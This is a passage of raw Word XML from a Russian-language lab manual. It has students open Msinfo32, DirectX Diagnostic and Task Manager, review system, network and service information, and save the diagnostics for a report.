          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Практическая часть</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EA04A8" w:rsidRPr="00617AC0" w:rsidRDefault="00EA04A8" w:rsidP="00EA04A8">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Запустите на выполнение модули Msinfo32, Taskmgr.exe, Dxdiag.exe. Сверните появившиеся окна </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Сведения о системе</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Средство диагностики DirectX</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> и </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Диспетчер задач</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> на панель задач.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EA04A8" w:rsidRPr="00617AC0" w:rsidRDefault="00EA04A8" w:rsidP="00EA04A8">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">1. Разверните окно модуля </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Сведения о системе</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> и последовательно просмотрите все категории сведений. При этом обратите внимание на то, что глобально все категории делятся на четыре класса </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Ресурсы аппаратуры</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Компоненты</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Программная среда</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> и </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Параметры обозревателя</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. Наиболее полезными с точки зрения сетевого администрирования являются категории </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Конфликты/Совместное использование</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> и </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Прерывания</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> в классе </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Ресурсы аппаратуры</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, категория </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Сеть</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> в классе </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Компоненты</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, а также категории </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Переменные среды</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Сетевые подключения</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> и </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Службы</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> в классе </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Программная среда</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. Необходимо отметить, что указанные классы ресурсов являются ценным источником системной информации, поскольку позволяют отслеживать аппаратные и программные изменения как локально, так и удаленно. Последнее может быть осуществлено посредством выбора </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Удаленный компьютер…</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> в меню </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Вид</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. Кроме того, отдельный интерес может представлять информация, собранная в классе </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Параметры обозревателя</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EA04A8" w:rsidRPr="00617AC0" w:rsidRDefault="00EA04A8" w:rsidP="00EA04A8">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">2. Выберите </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Журнал сведений о системе</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> в меню </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Вид</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> и изучите его на предмет какие ресурсы аппаратуры и программные компоненты задействованы в текущий момент в системе.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EA04A8" w:rsidRPr="00617AC0" w:rsidRDefault="00EA04A8" w:rsidP="00EA04A8">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">3. Разверните окно следующего системного модуля </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Диагностика DirectX</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, предназначенного для диагностирования аппаратных и программных компонентов компьютера, применяющихся для поддержки средств мультимедиа в играх и фильмах, и последовательно изучите все его вкладки. На вкладках </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Дисплей</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Звук</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> и </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Музыка</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> осуществите проверку соответствующих программных составляющих DirectX, а именно, интерфейсов DirectDraw, DirectSound и DirectMusic. Сохраните все сведения в текстовый файл для отчета. Обратите внимание на то, что системный модуль </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Диагностика DirectX</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> также может быть вызван из меню </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Сервис</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> программного модуля </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Сведения о системе</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EA04A8" w:rsidRPr="00617AC0" w:rsidRDefault="00EA04A8" w:rsidP="00EA04A8">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">4. Универсальный системный модуль </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Диспетчер задач</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
